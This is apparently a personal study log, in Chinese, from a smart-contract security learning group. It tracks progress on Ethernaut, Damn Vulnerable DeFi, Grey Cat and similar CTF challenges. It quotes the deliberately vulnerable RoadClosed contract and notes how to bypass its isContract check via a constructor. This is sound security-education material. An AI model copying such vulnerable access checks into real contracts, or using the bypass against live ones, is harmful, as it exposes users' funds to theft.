| timezone |
|---|
Asia/Taipei |
-
自我介绍
SunSec Founder of DeFiHackLabs. 致力於安全教育和提升區塊鏈生態安全.
-
你认为你会完成本次残酷学习吗? 85%可以. 除非臨時任務太多XD 主要時間會花在協助大家完成共學.
學習內容:
- A 系列的 Ethernaut CTF, 之前做了差不多了. POC: ethernaut-foundry-solutions
- A 系列的 QuillAudit CTF 題目的網站關掉了, 幫大家收集了題目, 不過還是有幾題沒找到. 有找到題目的人可以在發出來.
- A 系列的 DamnVulnerableDeFi 有持續更新, 題目也不錯. Damn Vulnerable DeFi.
- 使用 Foundry 在本地解題目, 可以參考下面 RoadClosed 為例子
forge test --match-teat testRoadClosedExploit -vvvv
function addToWhitelist(address addr) public {
require(!isContract(addr), "Contracts are not allowed");
whitelistedMinters[addr] = true;
}
function changeOwner(address addr) public {
require(whitelistedMinters[addr], "You are not whitelisted");
require(msg.sender == addr, "address must be msg.sender");
require(addr != address(0), "Zero address");
owner = addr;
}
function pwn(address addr) external payable {
require(!isContract(msg.sender), "Contracts are not allowed");
require(msg.sender == addr, "address must be msg.sender");
require(msg.sender == owner, "Must be owner");
hacked = true;
}
function pwn() external payable {
require(msg.sender == pwner);
hacked = true;
}
- 解決這個題目需要成為合約的 owner 和 hacked = true.
- On-chain: 可以透過
cast send或是 forge script 來解. - Local: 透過 forge test 通常是在local解題, 方便 debug.
- RoadClosed 為例子我寫了2個解題方式. testRoadClosedExploit 和 testRoadClosedContractExploit (因為題目有檢查msg.sender是不是合約, 所以可以透過constructor來繞過 isContract)
- POC
- DamnVulnerableDeFi #1 Unstoppable
- DamnVulnerableDeFi #2 naive-receiver
- DamnVulnerableDeFi #3 Truster
- DamnVulnerableDeFi #4 Side Entrance
- DamnVulnerableDeFi #5 The Rewarder
- DamnVulnerableDeFi #6 Selfie
- DamnVulnerableDeFi #7 Compromised
- DamnVulnerableDeFi #8 Puppet
- DamnVulnerableDeFi #9 Puppet V2
- DamnVulnerableDeFi #10 Free Rider
- DamnVulnerableDeFi #11 Backdoor
- DamnVulnerableDeFi #12 Climber
- DamnVulnerableDeFi #13 Wallet Mining 還沒解完
- DamnVulnerableDeFi #14 Puppet V3
- DamnVulnerableDeFi #15 ABI Smuggling
- DamnVulnerableDeFi #16 Shards
- DamnVulnerableDeFi #17 Curvy Puppet
- DamnVulnerableDeFi #18 Withdrawal
- DamnVulnerableDeFi Recap
- Grey Cat #1 GreyHats Dollar
- Grey Cat #2 Escrow
- Damn - Wallet Mining - 可以透過create2算出user deposit wallet的nonce為13
- Damn - Curvy Puppet - 與作者確認後,題目沒有出錯. 需要使用multiple flashloan.
- DamnVulnerableDeFi #13 solved Wallet Mining
- Foundry computeCreate2Address.
- Create Safe wallet process.
- DamnVulnerableDeFi #17 solved Curvy Puppet writeup 最後再更新出來, 讓大家體驗一下殘酷.
- ✅ 完成 DamnVulnerableDeFi
- Grey Cat #3 Simple AMM Vault
- Grey Cat #4 Voting Vault
- Grey Cat #5 Meta Staking
- Grey Cat #6 Gnosis Unsafe
- 出了兩個簡單題目for bootcamp 加分題
- warroom-ethcc-2023#1 Proxy capture
- warroom-ethcc-2023#2 Flash loan
- warroom-ethcc-2023#3 Signature malleability
- warroom-ethcc-2023#4 Proxy capture
- warroom-ethcc-2023#5 Metamorphic
- Review 3 challenges from fuzzland.